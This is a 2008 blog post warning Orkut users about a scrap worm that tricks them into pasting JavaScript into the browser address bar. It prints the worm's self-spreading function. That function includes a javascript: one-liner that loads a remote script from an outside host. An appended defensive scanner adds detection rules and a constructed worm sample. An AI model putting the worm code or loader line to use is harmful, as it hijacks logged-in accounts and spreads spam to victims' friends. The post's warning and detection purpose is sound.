Thursday, February 07, 2008

Orkut and Scraps with Scripts

I normally do not try clicking or pasting a link when it is received as an Orkut Scrap post or an email, unless it really makes some sense. Today I got one scrap entry in my Orkut from a friend of mine asking me to copy and paste a line into the address bar and then hit enter. I tried that to find out what is happening behind the scenes... And I was surprised to see that it was posting a similar scrap to all friends in my Orkut account under cover! I was embarrassed too, to know that I never suspected that!

Here is what these scripts will do:

1. You get a scrap post in Orkut from a friend of yours asking you to copy and paste some lines into the address bar and then hit enter to see some tricks or to view some information.

2. These lines are actually a piece of JavaScript code, mostly pointing to another script file hosted somewhere else.

3. JavaScript can execute even from the address bar of the browser. These scripts have the logic coded inside to get access to different sections of your Orkut account.

4. Since you are already logged into Orkut, and the script is running from that page, it is possible to fetch all your friends’ details, or all your scraps, and do things like sending scraps to everyone on your behalf.

5. While you are busy enjoying the superficial trick of the scripts (like showing all your friends’ photos in an interesting animation, or a detailed web page with some useful information), the script will be busy doing these kinds of activities under cover.

Below is the content of one such JavaScript:


    function SendScrapToAll()
    {
        var scrapText;
        scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
            "<br><br>"+
            "[orange]<i>javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)</i>[/orange]"+
            "<br><br>"+
            "[red]trust me, you'll find thispic funny! [:)] ";

        if(c == select.length)
            return;

        try{
            if(select[c].value!="")
            {
                sendScrap(select[c].value,scrapText);
            }
        }catch(e){
            //Suppressed Exception
        } finally {
            c = c+ 1;
            setTimeout("SendScrapToAll()", 666);
        }
    }

So be aware... and never run any scripts or click on links that come as scrap entries!
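
As a defensive counterpart to the steps above, here is an added example (not part of the original post, and not Orkut's own filtering) that scans scrap text for the address-bar pattern described. The rule ids, the verdict names and the placeholder host in the constructed samples are assumptions.

```javascript
// Added example: flag scrap text carrying an address-bar "javascript:" payload.
// Rule ids and verdict names are assumptions, not Orkut's own filtering.
const RULES = [
  { id: 'javascript-uri',   re: /javascript\s*:/i },
  { id: 'script-injection', re: /createElement\s*\(\s*['"]script['"]\s*\)/i },
  { id: 'remote-src',       re: /\.src\s*=\s*['"]https?:\/\/[^'"]+['"]/i },
  { id: 'address-bar-lure', re: /(paste|copy)[^.]{0,80}address\s*bar/i },
];

// Strip scrap markup ([blue], [:)], <i>, <br>) so the rules see the plain
// text that the reader is being told to paste.
function normalize(text) {
  return text
    .replace(/\[\/?(?:[a-z]+|:\))\]/gi, '')
    .replace(/<\/?[a-z][^>]*>/gi, '')
    .replace(/\s+/g, ' ')
    .trim();
}

function scanScrap(text) {
  const clean = normalize(text);
  const hits = RULES.filter(r => r.re.test(clean)).map(r => r.id);
  const urls = [...clean.matchAll(/\.src\s*=\s*['"](https?:\/\/[^'"]+)['"]/gi)]
    .map(m => m[1]);
  // javascript: URI plus remote script loading is the pattern in the post;
  // a lure or a bare javascript: URI alone only goes to manual review.
  const loadsCode = hits.includes('script-injection') || hits.includes('remote-src');
  let verdict = 'allow';
  if (hits.includes('javascript-uri') && loadsCode) verdict = 'block';
  else if (hits.length > 0) verdict = 'review';
  return { verdict, hits, urls };
}

// Constructed samples; the host is a placeholder, not the one from the post.
const SAMPLES = {
  worm: "[blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]<br><br>" +
    "[orange]<i>javascript:d=document;c=d.createElement('script');d.body.appendChild(c);" +
    "c.src='http://scripts.example.invalid/x.js';void(0)</i>[/orange]",
  lure: "Paste this link in your address bar: http://example.invalid/album",
  benign: "Hey, saw your pictures from the trip. Call me tonight!",
};

for (const [name, text] of Object.entries(SAMPLES)) {
  console.log(name, JSON.stringify(scanScrap(text)));
}
```

The `urls` field gives the externally hosted script locations, which are the useful indicators to hand to whoever maintains a blocklist.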

3 comments:

  1. I got a few as well. I don't know what's more funny, the fact that you can see 'javascript' written in the link or that the coder is handling exceptions as well.

  2. Thanks Sudhir... looks like he is the one who did it...
